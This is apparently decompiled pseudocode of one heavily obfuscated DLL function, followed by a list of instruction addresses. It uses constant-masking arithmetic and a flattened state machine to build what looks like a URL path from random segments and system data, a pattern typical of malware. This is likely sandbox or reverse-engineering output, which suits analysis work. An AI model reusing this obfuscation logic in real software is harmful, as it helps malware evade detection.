				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) >> 6;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) + 0x3b98;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) ^ 0x00002f0a;
				 *(_t1012 + 0x24) = 0xdc2f;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0xf29ba80e;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) / _t889;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) + 0x267d;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0x068eac78;
				 *(_t1012 + 0x54) = 0xb4c2;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) >> 4;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0x633a81e3;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0xd55c9070;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0xb6663903;
				 *(_t1012 + 0xc0) = 0x8be9;
				_t890 = 0x3b;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xc0) / _t890;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xbc) + 0xffff9a8b;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xbc) ^ 0xffffa766;
				 *(_t1012 + 0x78) = 0x5bde;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) * 0x59;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) << 0xd;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) >> 9;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) ^ 0x007f2aa6;
				 *(_t1012 + 0x90) = 0x411a;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0xcf7ab9d1;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) >> 7;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x019eb365;
				 *(_t1012 + 0xe0) = 0x6764;
				 *(_t1012 + 0xe0) =  *(_t1012 + 0xe0) ^ 0xbe6d5056;
				 *(_t1012 + 0xe0) =  *(_t1012 + 0xe0) ^ 0xbe6d5d89;
				 *(_t1012 + 0x108) = 0x76f2;
				 *(_t1012 + 0x108) =  *(_t1012 + 0x108) ^ 0xb105586c;
				 *(_t1012 + 0x108) =  *(_t1012 + 0x108) ^ 0xb10528cb;
				 *(_t1012 + 0xe8) = 0x1628;
				 *(_t1012 + 0xe8) =  *(_t1012 + 0xe8) << 0xf;
				 *(_t1012 + 0xe8) =  *(_t1012 + 0xe8) ^ 0x0b146bd8;
				 *(_t1012 + 0x13c) = 0x8150;
				 *(_t1012 + 0x13c) =  *(_t1012 + 0x13c) ^ 0x01db2c46;
				 *(_t1012 + 0x13c) =  *(_t1012 + 0x13c) ^ 0x01dbc499;
				 *(_t1012 + 0x28) = 0xe57d;
				 *(_t1012 + 0x28) =  *(_t1012 + 0x28) + 0xffff940d;
				_t891 = 0x52;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x28) * 0xa;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) / _t891;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0x00002d62;
				 *(_t1012 + 0xd4) = 0xda51;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) << 8;
				_t892 = 0x2f;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) / _t892;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) ^ 0x0004b460;
				 *(_t1012 + 0x144) = 0xc4bd;
				 *(_t1012 + 0x144) =  *(_t1012 + 0x144) | 0x99168015;
				 *(_t1012 + 0x144) =  *(_t1012 + 0x144) ^ 0x991680ca;
				 *(_t1012 + 0x4c) = 0xf40b;
				_t893 = 0xf;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x4c) * 0x64;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) >> 0x10;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) + 0x4d44;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) ^ 0x00003d1f;
				 *(_t1012 + 0x80) = 0xe0fb;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x7a83a018;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x3dd3f5db;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x2cc23c84;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x6b92f75e;
				 *(_t1012 + 0x40) = 0x3ba;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0xe0c2;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) * 0x6e;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0x8785;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) ^ 0x00629da9;
				 *(_t1012 + 0x110) = 0xc1c4;
				 *(_t1012 + 0x110) =  *(_t1012 + 0x110) ^ 0xb305b232;
				 *(_t1012 + 0x110) =  *(_t1012 + 0x110) ^ 0xb3050daf;
				 *(_t1012 + 0x138) = 0x83df;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x6f2297cb;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x6f221ab4;
				 *(_t1012 + 0xec) = 0xe7e3;
				 *(_t1012 + 0xec) =  *(_t1012 + 0xec) >> 0xe;
				 *(_t1012 + 0xec) =  *(_t1012 + 0xec) ^ 0x00003f29;
				 *(_t1012 + 0x6c) = 0x9be6;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) | 0xdb39baf6;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) * 0xe;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 4;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) ^ 0xd2843690;
				 *(_t1012 + 0x98) = 0x25e5;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) * 0x5f;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) + 0xf2a9;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x000f50c4;
				 *(_t1012 + 0xf0) = 0x6aad;
				 *(_t1012 + 0xf0) =  *(_t1012 + 0xf0) >> 0xb;
				 *(_t1012 + 0xf0) =  *(_t1012 + 0xf0) ^ 0x00000b06;
				 *(_t1012 + 0x11c) = 0xe6d7;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) * 0x44;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) ^ 0x003d0209;
				 *(_t1012 + 0x58) = 0xa945;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) / _t893;
				_t894 = 0x22;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x58) / _t894;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0x1aba;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) ^ 0x00003b06;
				 *(_t1012 + 0x64) = 0x44c5;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) + 0x4f06;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) << 0xe;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) >> 0xb;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0x0004ce26;
				 *(_t1012 + 0x3c) = 0xcc93;
				_t895 = 0x1a;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t895;
				_t896 = 0x29;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t896;
				_t897 = 0x77;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t897;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) ^ 0x000043f4;
				 *(_t1012 + 0x12c) = 0xa0a2;
				 *(_t1012 + 0x12c) =  *(_t1012 + 0x12c) ^ 0x7e84551b;
				 *(_t1012 + 0x12c) =  *(_t1012 + 0x12c) ^ 0x7e84971f;
				 *(_t1012 + 0x74) = 0xdad7;
				_t898 = 0x26;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) / _t898;
				_t899 = 0x42;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) * 0x48;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) + 0xffff34f2;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) ^ 0x0000936e;
				 *(_t1012 + 0x34) = 0x892d;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) >> 6;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) ^ 0xe5fcb6e4;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) << 4;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) ^ 0x5fcb3f6d;
				 *(_t1012 + 0xfc) = 0x9a3e;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) / _t899;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) ^ 0x00006544;
				 *(_t1012 + 0x124) = 0x2293;
				 *(_t1012 + 0x124) =  *(_t1012 + 0x124) + 0x79b;
				 *(_t1012 + 0x124) =  *(_t1012 + 0x124) ^ 0x00006b1d;
				 *(_t1012 + 0xbc) = 0x3e81;
				_t900 = 7;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xbc) * 0x31;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xb8) + 0xb35c;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xb8) ^ 0x000cf45c;
				 *(_t1012 + 0x64) = 0x7cb6;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0x88e3463d;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) * 0x56;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) << 0xf;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0xd559658e;
				 *(_t1012 + 0xac) = 0xf45a;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) / _t900;
				_t901 = 0x60;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) * 0x3e;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) ^ 0x000800e5;
				 *(_t1012 + 0xe4) = 0xf8f;
				 *(_t1012 + 0xe4) =  *(_t1012 + 0xe4) >> 4;
				 *(_t1012 + 0xe4) =  *(_t1012 + 0xe4) ^ 0x0000477d;
				 *(_t1012 + 0xdc) = 0xf07b;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) >> 0xb;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) ^ 0x00007281;
				 *(_t1012 + 0xd4) = 0xb5b1;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) << 0xd;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) + 0xffff2f0a;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) ^ 0x16b57b93;
				 *(_t1012 + 0x10c) = 0xd67e;
				 *(_t1012 + 0x10c) =  *(_t1012 + 0x10c) ^ 0x498b92c7;
				 *(_t1012 + 0x10c) =  *(_t1012 + 0x10c) ^ 0x498b23c9;
				 *(_t1012 + 0xcc) = 0x2221;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) << 2;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) >> 6;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) ^ 0x0000659f;
				 *(_t1012 + 0x104) = 0x2a0b;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) >> 4;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) ^ 0x000066a5;
				 *(_t1012 + 0xc8) = 0x810d;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) / _t901;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) << 0x10;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) ^ 0x01580000;
				_t902 =  *((intOrPtr*)(_t1012 + 0x158));
				 *((intOrPtr*)(_t1012 + 0x14)) =  *((intOrPtr*)(_t1012 + 0x15c));
				 *((intOrPtr*)(_t1012 + 0x154)) = _t902;
				while(1) {
					_t1015 = _t906 - 0x1e362325;
					if(_t1015 > 0) {
						goto L30;
					}
					L2:
					if(_t1015 == 0) {
						_push(_t906);
						_t1001 = E1000ADBD( *((intOrPtr*)(_t997 + 4)));
						_t902 = E100157E8(_t838);
						 *((intOrPtr*)(_t1012 + 0x158)) = _t902;
						__eflags = _t902;
						if(__eflags != 0) {
							_t823 = E1001BD4A( *(_t1012 + 0xc0),  *(_t1012 + 0x3c), __eflags, _t902,  *(_t1012 + 0xcc), _t1001,  *_t997,  *((intOrPtr*)(_t997 + 4)));
							_t1012 = _t1012 + 0x14;
							 *((intOrPtr*)(_t1012 + 0x14)) = _t823;
							__eflags = _t823;
							if(__eflags == 0) {
								E100091CD( *(_t1012 + 0x90),  *((intOrPtr*)(_t1012 + 0x120)),  *(_t1012 + 0x84), _t902,  *(_t1012 + 0x74));
							} else {
								_t906 = 0x30070f42;
								goto L13;
							}
						}
					} else {
						_t1016 = _t906 - 0x12f44b45;
						if(_t1016 > 0) {
							__eflags = _t906 - 0x1993ee00;
							if(_t906 == 0x1993ee00) {
								_t926 = _t1012 + 0x17c;
								E100106C2(_t926,  *(_t1012 + 0xb4),  *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0x11c), _t1012 + 0x158);
								_t1012 = _t1012 + 0xc;
								asm("sbb ecx, ecx");
								_t906 = (_t926 & 0x08d2d6d7) + 0x3077984c;
								goto L10;
							} else {
								__eflags = _t906 - 0x1bb47d9a;
								if(_t906 == 0x1bb47d9a) {
									 *(_t1012 + 0x164) =  *(_t1012 + 0xc8);
									 *(_t1012 + 0x168) =  *(_t1012 + 0x168) & 0x00000000;
									_t928 =  *(_t1012 + 0x168);
									E1000ADCE(_t928,  *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0xa4), _t1012 + 0x1a4,  *(_t1012 + 0x5c),  *(_t1012 + 0x128), _t1012 + 0x29c, _t1012 + 0x17c, _t1012 + 0x168,  *((intOrPtr*)(_t1012 + 0x140)),  *((intOrPtr*)(_t1012 + 0x16c)), _t1012 + 0x488);
									_t1012 = _t1012 + 0x28;
									asm("sbb ecx, ecx");
									_t906 = (_t928 & 0x1b5b9d4f) + 0x12f44b45;
									goto L10;
								} else {
									__eflags = _t906 - 0x1bef9ca6;
									if(_t906 != 0x1bef9ca6) {
										goto L44;
									} else {
										_t998 = _t1012 + 0x288;
										_t930 = 6;
										_t1010 =  *(_t1012 + 0x14c) % _t930 + 1;
										__eflags = _t1010;
										if(__eflags != 0) {
											__eflags = 1;
											do {
												_t881 = 0xf;
												_t1006 = ( *(_t1012 + 0x14c) & _t881) + 4;
												E100060DA(_t1012 + 0x14c,  *(_t1012 + 0xe8), 1, _t1006,  *(_t1012 + 0x13c),  *(_t1012 + 0x108),  *(_t1012 + 0xa4), _t998);
												_t1012 = _t1012 + 0x18;
												_t999 = _t998 + _t1006 * 2;
												_t883 = 0x2f;
												 *_t999 = _t883;
												_t998 = _t999 + 2;
												_t1010 = _t1010 - 1;
												__eflags = _t1010;
											} while (__eflags != 0);
											_t902 =  *((intOrPtr*)(_t1012 + 0x154));
											_t1002 =  *((intOrPtr*)(_t1012 + 0xc98));
										}
										_t1008 =  *((intOrPtr*)(_t1012 + 0x150));
										 *_t998 = 0;
										_t906 = 0x93c2f64;
										_t823 =  *((intOrPtr*)(_t1012 + 0x14));
										_t997 =  *((intOrPtr*)(_t1012 + 0xc90));
										continue;
									}
								}
							}
						} else {
							if(_t1016 == 0) {
								E100091CD( *(_t1012 + 0x6c),  *((intOrPtr*)(_t1012 + 0x44)),  *(_t1012 + 0x130),  *((intOrPtr*)(_t1012 + 0x170)),  *((intOrPtr*)(_t1012 + 0x70)));
								_t1012 = _t1012 + 0xc;
								_t906 = 0x1ac68c4;
								goto L10;
							} else {
								if(_t906 == 0x1ac68c4) {
									E100091CD( *(_t1012 + 0x3c),  *(_t1012 + 0x104),  *(_t1012 + 0x128),  *((intOrPtr*)(_t1012 + 0x15c)),  *(_t1012 + 0xb8));
									_t1012 = _t1012 + 0xc;
									_t906 = 0x3077984c;
									goto L10;
								} else {
									if(_t906 == 0x4136454) {
										E100091CD( *(_t1012 + 0xa4),  *(_t1012 + 0xfc),  *(_t1012 + 0x124),  *(_t1012 + 0x164),  *(_t1012 + 0x58));
										_t1012 = _t1012 + 0xc;
										_t906 = 0x12f44b45;
										goto L10;
									} else {
										if(_t906 == 0x599ba18) {
											_push(0x100014d4);
											_push( *(_t1012 + 0xc0));
											E100164EC(_t1012 + 0x214, __eflags, E1001BF25( *(_t1012 + 0x28),  *(_t1012 + 0x58), __eflags),  *(_t1012 + 0x98), 0x400, _t1012 + 0x2a0, _t1012 + 0x198,  *((intOrPtr*)(_t1012 + 0xa0)),  *(_t1012 + 0xec),  *(_t1012 + 0x110));
											E1001C5F7( *(_t1012 + 0x11c),  *((intOrPtr*)(_t1012 + 0x170)),  *(_t1012 + 0x58),  *(_t1012 + 0xfc), _t861);
											_t1012 = _t1012 + 0x34;
											_t906 = 0x2dee6d8e;
											L12:
											_t823 =  *((intOrPtr*)(_t1012 + 0x14));
											L13:
											_t1002 =  *((intOrPtr*)(_t1012 + 0xc98));
											continue;
										} else {
											_t1020 = _t906 - 0x93c2f64;
											if(_t906 != 0x93c2f64) {
												L44:
												__eflags = _t906 - 0x12d8e207;
												if(__eflags != 0) {
													continue;
													do {
														while(1) {
															_t1015 = _t906 - 0x1e362325;
															if(_t1015 > 0) {
																goto L30;
															}
															goto L2;
														}
														goto L30;
													} while (__eflags != 0);
													goto L45;
												} else {
													L45:
												}
											} else {
												E10005856(_t1012 + 0x208, _t997, _t1020);
												_t906 = 0x599ba18;
												L10:
												_t823 =  *((intOrPtr*)(_t1012 + 0x14));
												while(1) {
													_t1015 = _t906 - 0x1e362325;
													if(_t1015 > 0) {
														goto L30;
													}
													goto L2;
												}
											}
										}
									}
								}
							}
						}
					}
					L47:
					return _t1008;
					L30:
					__eflags = _t906 - 0x22fa333e;
					if(_t906 == 0x22fa333e) {
						E100091CD( *(_t1012 + 0xe0),  *((intOrPtr*)(_t1012 + 0x118)),  *(_t1012 + 0xd4), _t902,  *(_t1012 + 0x104));
						_t823 =  *((intOrPtr*)(_t1012 + 0x20));
						_t1012 = _t1012 + 0xc;
						_t906 = 0x12d8e207;
						goto L44;
					} else {
						__eflags = _t906 - 0x2a5de1a5;
						if(_t906 == 0x2a5de1a5) {
							 *(_t1012 + 0x14c) = E10017B6B();
							_t906 = 0x1e362325;
							goto L10;
						} else {
							__eflags = _t906 - 0x2dee6d8e;
							if(_t906 == 0x2dee6d8e) {
								E10011259(_t1012 + 0x15c, _t1012 + 0x20c, _t1012 + 0x16c);
								_pop(_t909);
								asm("sbb ecx, ecx");
								_t906 = (_t909 & 0x1a0814d6) + 0x1ac68c4;
								goto L10;
							} else {
								__eflags = _t906 - 0x2e4fe894;
								if(_t906 == 0x2e4fe894) {
									__eflags = E1000C07D( *((intOrPtr*)(_t1012 + 0xc98)), _t1012 + 0x164,  *(_t1012 + 0xf0),  *(_t1012 + 0x6c));
									_t906 = 0x4136454;
									_t831 = 1;
									_t1008 =  !=  ? _t831 : _t1008;
									 *((intOrPtr*)(_t1012 + 0x150)) = _t1008;
									goto L10;
								} else {
									__eflags = _t906 - 0x30070f42;
									if(_t906 == 0x30070f42) {
										 *((intOrPtr*)(_t1012 + 0x188)) = _t823;
										_t914 = _t1012 + 0x178;
										 *((intOrPtr*)(_t1012 + 0x180)) = _t1002;
										 *((intOrPtr*)(_t1012 + 0x18c)) = _t902;
										E1000A83A(_t914,  *((intOrPtr*)(_t1012 + 0xd0)),  *(_t1012 + 0x90), _t1012 + 0x180,  *(_t1012 + 0xb4));
										_t1012 = _t1012 + 0xc;
										asm("sbb ecx, ecx");
										_t906 = (_t914 & 0xf699bac2) + 0x22fa333e;
										goto L10;
									} else {
										__eflags = _t906 - 0x3077984c;
										if(_t906 == 0x3077984c) {
											E100091CD( *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0xb8),  *(_t1012 + 0xec),  *(_t1012 + 0x178),  *(_t1012 + 0xdc));
											_t1012 = _t1012 + 0xc;
											_t906 = 0x22fa333e;
											goto L10;
										} else {
											__eflags = _t906 - 0x394a6f23;
											if(__eflags != 0) {
												goto L44;
											} else {
												_push(0x100014a4);
												_push( *(_t1012 + 0x90));
												E10003482( *(_t1012 + 0x6c), __eflags, ( *( *0x100221c0 + 0x18))[3] & 0x000000ff, _t1012 + 0x1b4,  *((intOrPtr*)(_t1012 + 0x170)),  *(_t1012 + 0x14c),  *( *( *0x100221c0 + 0x18)) & 0x000000ff, ( *( *0x100221c0 + 0x18))[2] & 0x000000ff, 0x40, ( *( *0x100221c0 + 0x18))[1] & 0x000000ff, E1001BF25( *(_t1012 + 0x13c),  *(_t1012 + 0x9c), __eflags),  *((intOrPtr*)(_t1012 + 0x44)),  *(_t1012 + 0xb0),  *(_t1012 + 0xa4));
												E1001C5F7( *((intOrPtr*)(_t1012 + 0xa0)),  *(_t1012 + 0x98),  *((intOrPtr*)(_t1012 + 0x16c)),  *(_t1012 + 0x88), _t867);
												_t1012 = _t1012 + 0x44;
												_t906 = 0x1bef9ca6;
												 *(_t1012 + 0x168) = ( *( *0x100221c0 + 0x18))[4] & 0x0000ffff;
												goto L12;
											}
										}
									}
								}
							}
						}
					}
					goto L47;
				}
			}

0x10019dd1
0x10019dd8
0x10019ddf
0x10019de0
0x10019de7
0x10019de8
0x10019de9
0x10019dea
0x10019def
0x10019dfa
0x10019e04
0x10019e07
0x10019e0e
0x10019e13
0x10019e1a
0x10019e25
0x10019e30
0x10019e3b
0x10019e46
0x10019e4e
0x10019e53
0x10019e5b
0x10019e63
0x10019e6b
0x10019e73
0x10019e78
0x10019e80
0x10019e88
0x10019e90
0x10019e9b
0x10019ea6
0x10019eb1
0x10019ebe
0x10019ec2
0x10019eca
0x10019ed2
0x10019eda
0x10019ee5
0x10019ef0
0x10019ef7
0x10019f02
0x10019f0a
0x10019f12
0x10019f1a
0x10019f22
0x10019f2a
0x10019f35
0x10019f48
0x10019f4f
0x10019f5a
0x10019f6d
0x10019f74
0x10019f7f
0x10019f87
0x10019f92
0x10019f9d
0x10019fa4
0x10019faf
0x10019fb7
0x10019fbc
0x10019fc4
0x10019fcc
0x10019fd4
0x10019fdc
0x10019fe1
0x10019fe9
0x10019ff1
0x10019ff9
0x1001a004
0x1001a017
0x1001a01e
0x1001a029
0x1001a036
0x1001a041
0x1001a049
0x1001a054
0x1001a05f
0x1001a067
0x1001a06f
0x1001a07a
0x1001a085
0x1001a090
0x1001a098
0x1001a0a3
0x1001a0b1
0x1001a0b6
0x1001a0bc
0x1001a0c1
0x1001a0c6
0x1001a0ce
0x1001a0d9
0x1001a0e4
0x1001a0ef
0x1001a0fa
0x1001a105
0x1001a110
0x1001a11b
0x1001a126
0x1001a131
0x1001a13c
0x1001a147
0x1001a152
0x1001a15d
0x1001a168
0x1001a174
0x1001a179
0x1001a17f
0x1001a18c
0x1001a18f
0x1001a193
0x1001a19b
0x1001a1a3
0x1001a1a8
0x1001a1ad
0x1001a1b5
0x1001a1bd
0x1001a1d3
0x1001a1da
0x1001a1e5
0x1001a1f0
0x1001a1f8
0x1001a203
0x1001a20b
0x1001a213
0x1001a21b
0x1001a220
0x1001a228
0x1001a23b
0x1001a23c
0x1001a24b
0x1001a252
0x1001a25d
0x1001a271
0x1001a278
0x1001a285
0x1001a290
0x1001a298
0x1001a2a0
0x1001a2a8
0x1001a2ad
0x1001a2b5
0x1001a2bd
0x1001a2cc
0x1001a2cf
0x1001a2d8
0x1001a2dc
0x1001a2e4
0x1001a2ef
0x1001a2f7
0x1001a302
0x1001a30f
0x1001a313
0x1001a318
0x1001a320
0x1001a328
0x1001a33e
0x1001a345
0x1001a350
0x1001a363
0x1001a366
0x1001a36d
0x1001a378
0x1001a383
0x1001a38e
0x1001a399
0x1001a3a4
0x1001a3ac
0x1001a3b7
0x1001a3c2
0x1001a3ca
0x1001a3da
0x1001a3de
0x1001a3e6
0x1001a3ee
0x1001a3f6
0x1001a3fb
0x1001a403
0x1001a40b
0x1001a413
0x1001a425
0x1001a428
0x1001a42f
0x1001a43a
0x1001a445
0x1001a452
0x1001a456
0x1001a45b
0x1001a460
0x1001a468
0x1001a473
0x1001a47e
0x1001a486
0x1001a491
0x1001a49c
0x1001a4a7
0x1001a4b2
0x1001a4bd
0x1001a4c8
0x1001a4d5
0x1001a4e0
0x1001a4e8
0x1001a4f3
0x1001a4fe
0x1001a509
0x1001a514
0x1001a51c
0x1001a52b
0x1001a52e
0x1001a53a
0x1001a53e
0x1001a546
0x1001a551
0x1001a560
0x1001a565
0x1001a56e
0x1001a579
0x1001a584
0x1001a58f
0x1001a59a
0x1001a5a7
0x1001a5a8
0x1001a5ac
0x1001a5b1
0x1001a5b9
0x1001a5c1
0x1001a5cc
0x1001a5d7
0x1001a5e2
0x1001a5ed
0x1001a5f8
0x1001a600
0x1001a60d
0x1001a611
0x1001a619
0x1001a621
0x1001a62c
0x1001a637
0x1001a642
0x1001a64d
0x1001a658
0x1001a663
0x1001a66e
0x1001a676
0x1001a681
0x1001a689
0x1001a696
0x1001a69a
0x1001a69f
0x1001a6a7
0x1001a6ba
0x1001a6c1
0x1001a6cc
0x1001a6d7
0x1001a6e2
0x1001a6ea
0x1001a6f5
0x1001a708
0x1001a70f
0x1001a71a
0x1001a728
0x1001a734
0x1001a739
0x1001a73f
0x1001a747
0x1001a74f
0x1001a757
0x1001a75f
0x1001a764
0x1001a769
0x1001a771
0x1001a77d
0x1001a782
0x1001a78c
0x1001a791
0x1001a79b
0x1001a7a0
0x1001a7a6
0x1001a7ae
0x1001a7b9
0x1001a7c4
0x1001a7cf
0x1001a7db
0x1001a7e0
0x1001a7eb
0x1001a7ee
0x1001a7f2
0x1001a7fa
0x1001a802
0x1001a80a
0x1001a80f
0x1001a817
0x1001a81c
0x1001a824
0x1001a83a
0x1001a841
0x1001a84c
0x1001a857
0x1001a862
0x1001a86d
0x1001a880
0x1001a881
0x1001a888
0x1001a893
0x1001a89e
0x1001a8a6
0x1001a8b3
0x1001a8b7
0x1001a8bc
0x1001a8c4
0x1001a8d8
0x1001a8eb
0x1001a8ec
0x1001a8f3
0x1001a8fe
0x1001a909
0x1001a911
0x1001a91c
0x1001a927
0x1001a92f
0x1001a93a
0x1001a945
0x1001a94d
0x1001a958
0x1001a963
0x1001a96e
0x1001a979
0x1001a984
0x1001a98f
0x1001a997
0x1001a99f
0x1001a9aa
0x1001a9b5
0x1001a9bd
0x1001a9c8
0x1001a9dc
0x1001a9e3
0x1001a9eb
0x1001a9fd
0x1001aa04
0x1001aa08
0x1001aa0f
0x1001aa0f
0x1001aa15
0x00000000
0x00000000
0x1001aa1b
0x1001aa1b
0x1001ad25
0x1001ad2e
0x1001ad42
0x1001ad44
0x1001ad4c
0x1001ad4e
0x1001ad6d
0x1001ad72
0x1001ad75
0x1001ad79
0x1001ad7b
0x1001b009
0x1001ad81
0x1001ad81
0x00000000
0x1001ad81
0x1001ad7b
0x1001aa21
0x1001aa21
0x1001aa27
0x1001ab9d
0x1001aba3
0x1001acee
0x1001ad00
0x1001ad05
0x1001ad0a
0x1001ad12
0x00000000
0x1001aba9
0x1001aba9
0x1001abaf
0x1001ac60
0x1001ac76
0x1001acbb
0x1001acc2
0x1001acc7
0x1001accc
0x1001acd4
0x00000000
0x1001abb5
0x1001abb5
0x1001abbb
0x00000000
0x1001abc1
0x1001abc8
0x1001abd3
0x1001abd8
0x1001abd8
0x1001abd9
0x1001abdd
0x1001abde
0x1001abee
0x1001ac00
0x1001ac13
0x1001ac18
0x1001ac1b
0x1001ac20
0x1001ac21
0x1001ac24
0x1001ac27
0x1001ac27
0x1001ac27
0x1001ac2a
0x1001ac31
0x1001ac31
0x1001ac38
0x1001ac41
0x1001ac44
0x1001ac49
0x1001ac4d
0x00000000
0x1001ac4d
0x1001abbb
0x1001abaf
0x1001aa2d
0x1001aa2d
0x1001ab8b
0x1001ab90
0x1001ab93
0x00000000
0x1001aa33
0x1001aa39
0x1001ab5f
0x1001ab64
0x1001ab67
0x00000000
0x1001aa3f
0x1001aa45
0x1001ab2d
0x1001ab32
0x1001ab35
0x00000000
0x1001aa4b
0x1001aa51
0x1001aa76
0x1001aa7b
0x1001aad1
0x1001aaf0
0x1001aaf5
0x1001aaf8
0x1001aafd
0x1001aafd
0x1001ab01
0x1001ab01
0x00000000
0x1001aa53
0x1001aa53
0x1001aa59
0x1001afe1
0x1001afe1
0x1001afe7
0x00000000
0x1001aa0f
0x1001aa0f
0x1001aa0f
0x1001aa15
0x00000000
0x00000000
0x00000000
0x1001aa15
0x00000000
0x1001aa0f
0x00000000
0x00000000
0x1001afed
0x1001afed
0x1001aa5f
0x1001aa66
0x1001aa6b
0x1001aa70
0x1001aa70
0x1001aa0f
0x1001aa0f
0x1001aa15
0x00000000
0x00000000
0x00000000
0x1001aa15
0x1001aa0f
0x1001aa59
0x1001aa51
0x1001aa45
0x1001aa39
0x1001aa2d
0x1001aa27
0x1001b013
0x1001b01d
0x1001ad8b
0x1001ad8b
0x1001ad91
0x1001afd0
0x1001afd5
0x1001afd9
0x1001afdc
0x00000000
0x1001ad97
0x1001ad97
0x1001ad9d
0x1001afa2
0x1001afa9
0x00000000
0x1001ada3
0x1001ada3
0x1001ada9
0x1001af74
0x1001af7b
0x1001af7c
0x1001af84
0x00000000
0x1001adaf
0x1001adaf
0x1001adb5
0x1001af45
0x1001af47
